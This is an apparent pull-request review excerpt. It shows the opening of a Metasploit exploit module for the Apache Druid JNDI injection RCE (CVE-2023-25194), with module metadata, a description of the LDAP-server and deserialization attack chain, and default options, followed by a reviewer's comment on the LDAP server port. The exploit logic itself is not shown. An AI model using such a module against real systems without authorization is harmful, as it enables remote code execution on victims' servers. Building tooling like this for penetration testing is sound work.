modules/exploits/multi/http/apache_druid_cve_2023_25194.rb

```diff
@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Retry
+  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'Apache Druid JNDI Injection RCE',
+      'Description' => %q{
+
+        This module is designed to exploit the JNDI injection vulnerability
+        in Druid. The vulnerability specifically affects the indexer/v1/sampler
+        interface of Druid, enabling an attacker to execute arbitrary commands
+        on the targeted server.
+
+        The vulnerability is found in Apache Kafka clients versions ranging from
+        2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config
+        property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule,
+        it allows the server to establish a connection with the attacker's LDAP server
+        and deserialize the LDAP response. This provides the attacker with the capability
+        to execute java deserialization gadget chains on the Kafka connect server,
+        potentially leading to unrestricted deserialization of untrusted data or even
+        remote code execution (RCE) if there are relevant gadgets in the classpath.
+
+        To facilitate the exploitation process, this module will initiate an LDAP server
+        that the target server needs to connect to in order to carry out the attack.
+      },
+      'Author' => [
+        'RedWay Security <info[at]redwaysecurity.com>', # Metasploit module
+        'Jari Jääskelä <https://github.com/jarijaas>' # discovery
+      ],
+      'References' => [
+        [ 'CVE', '2023-25194' ],
+        [ 'URL', 'https://hackerone.com/reports/1529790'],
+        [ 'URL', 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz' ]
+      ],
+      'DisclosureDate' => '2023-02-07',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8888,
+        'SSL' => true,
+        'SRVPORT' => 389,
```

Comment:
From my testing it seems like the attacker's LDAP server can be hosted on any port and the server will still connect to it and deserialize the LDAP response. I think it might be worth setting SRVPORT above 1024 
```suggestion
        'SRVPORT' => 3389,
```